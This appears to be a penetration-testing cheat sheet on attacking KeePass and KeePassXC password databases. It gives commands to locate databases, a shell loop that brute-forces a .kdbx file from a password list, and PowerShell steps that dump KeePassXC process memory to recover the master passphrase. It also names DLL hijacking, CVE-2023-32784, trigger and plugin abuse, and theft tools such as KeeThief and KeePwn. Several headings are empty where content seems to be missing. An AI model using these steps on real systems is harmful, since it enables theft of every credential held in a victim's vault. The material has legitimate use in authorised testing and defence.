KeePass
Enumerate DB locations:
Cmd > type %APPDATA%\KeePass\KeePass.config.xml | findstr "<Path>"Unlock with CLI:
$ for pw in `cat passwords.txt`; do echo "$pw" | keepassxc-cli ls db.kdbx [--key-file key.keyx] |& grep -v -e Enter -e Error -e If; doneKeePassXC
PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item "C:\Program Files\KeePassXC\KeePassXC.exe")).FileVersionExtract Passphrase from Memory
Using strings2:
PS > .\strings2.exe -pid (Get-Process KeePassXC) -a -wide > KeePassXC_strings.txt
PS > gc .\KeePassXC_strings.txt | Select-String -Pattern "Passw0"
PS > (gc .\KeePassXC_strings.txt).length
PS > (gc .\KeePassXC_strings.txt).length / 1mbUsing Get-ProcessStrings from PowerShellArsenal/MemoryTools:
DLL Hijacking
Extract Passphrase from Memory (< v2.53.1)
CVE-2023-32784
Abusing KeePass Triggers (< v2.54)
Tools
KeeFarce
KeeFarceReborn
Abusing the KeePass Plugin Cache
Export DB by compiling and loading a custom plugin (requires admin's privileges to place the .plgx file):
Export DB by hijacking a legit plugin DLL (requires an existent plugin in use):
KeePassHax
KeeThief
CrackMapExec
KeePwn
ThievingFox
Last updated